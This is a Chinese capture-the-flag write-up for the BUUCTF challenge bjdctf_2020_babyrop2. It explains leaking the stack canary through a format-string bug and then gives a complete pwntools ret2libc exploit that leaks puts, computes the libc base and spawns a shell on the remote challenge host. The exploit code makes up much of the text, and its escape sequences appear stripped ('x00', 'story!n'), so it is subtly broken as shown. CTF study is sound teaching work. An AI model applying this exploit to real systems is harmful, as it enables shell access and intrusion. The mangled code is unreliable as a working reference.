使用checksec查看:
开启了Canary和栈不可执行,这题看标题就知道是一题栈溢出构造rop链的题目,存在Canary就代表我们首先要做的就是获取到Canary的值。
拉进IDA中查看:
main()函数中给了两个函数,首先看下gift():
printf(&format)这里就一个明显的格式化字符串漏洞,可通过该漏洞获取到Canary的值
Canary的值固定是rbp-8,so…用gdb调试可以看到就在我们输入的下方
用%7$p就可以拿到Canary的值了。
接着看vuln():
read(0, &buf, 0x64uLL);这里也是一处明显的栈溢出,buf变量距离rbp只有0x20
这个题目没有system和/bin/sh,需要我们自己去泄露libc进行利用,接下来就是ret2libc的标准操作了
exp:
from pwn import *
#start
r = remote("node4.buuoj.cn",27174)
# r = process("../buu/bjdctf_2020_babyrop2")
elf = ELF("../buu/bjdctf_2020_babyrop2")
libc = ELF("../buu/ubuntu16(64).so")
#params
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
vuln_addr = elf.symbols['vuln']
rdi_addr = 0x400993
#attack
payload = "%7$p"
r.sendlineafter("u!n",payload)
r.recvuntil("0x")
canary = int(r.recv(16),16)
payload = p64(canary)
payload = payload.rjust(0x20,b'M')
payload += b'M'*8 + p64(rdi_addr) + p64(puts_got) + p64(puts_plt) + p64(vuln_addr)
r.sendlineafter("story!n",payload)
put_addr = u64(r.recv(6).ljust(8,b'x00'))
#libc
base_addr = put_addr - libc.symbols['puts']
system_addr = base_addr + libc.symbols['system']
bin_sh_addr = base_addr + next(libc.search(b"/bin/sh"))
#attack2
payload = p64(canary)
payload = payload.rjust(0x20,b'M')
payload += b'M'*8 + p64(rdi_addr) + p64(bin_sh_addr) + p64(system_addr)
r.sendlineafter("story!n",payload)
r.interactive()
